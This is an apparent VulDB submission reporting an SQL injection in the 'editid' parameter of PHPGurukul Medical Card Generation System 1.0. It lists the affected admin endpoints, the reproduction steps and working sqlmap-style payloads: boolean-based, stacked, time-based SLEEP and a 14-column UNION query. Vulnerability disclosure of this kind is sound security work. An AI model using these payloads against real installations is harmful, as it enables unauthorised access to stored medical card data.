Submit #427403: PHPGurukul Medical Card Generation System - Editid Parameter V1.0 SQL Injectioninfo

TitlePHPGurukul Medical Card Generation System - Editid Parameter V1.0 SQL Injection
DescriptionI would like to report a SQL injection vulnerability I discovered in the phpgurukul of the Medical Card Generation System during my testing. Details: Affected URL/Endpoint: /mcgs/admin/changeimage.php?editid=1, /mcgs/admin/edit-card-detail.php?editid=1 Vulnerable Parameter: 'editid' Risk Level: High (allows malicious users to execute arbitrary SQL queries) Steps to reproduce: 1) Sign in as admin. 2) Navigate to Managecard > Action 'Edit' > Edit Image 3) Use a proxy like burpsuite to intercept the "card-bwdates-reports-details.php" request. 4) Input the payload to invoke the SQL injection. --- Parameter: editid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: editid=1 AND 3139=3139 Type: stacked queries Title: MySQL >= 5.0.12 stacked queries (comment) Payload: editid=1;SELECT SLEEP(5)# Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: editid=1 AND (SELECT 5373 FROM (SELECT(SLEEP(5)))VtOj) Type: UNION query Title: Generic UNION query (NULL) - 14 columns Payload: editid=1 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162717071,0x644d46485475624f4c745a70576f686b4152677175556968674b494d6145446b624a597163747477,0x7178706b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- - --- Please let me know if you need further information or a more detailed analysis.
User
 Delvy (UID 74555)
Submission10/21/2024 05:00 (2 years ago)
Moderation10/23/2024 13:05 (2 days later)
StatusAccepted
VulDB entry281565 [PHPGurukul Medical Card Generation System 1.0 Managecard Edit Card Detail Page edit-card-detail.php editid sql injection]
Points17

PreviousOverviewNext

Do you want to use VulDB in your project?

Use the official API to access entries easily!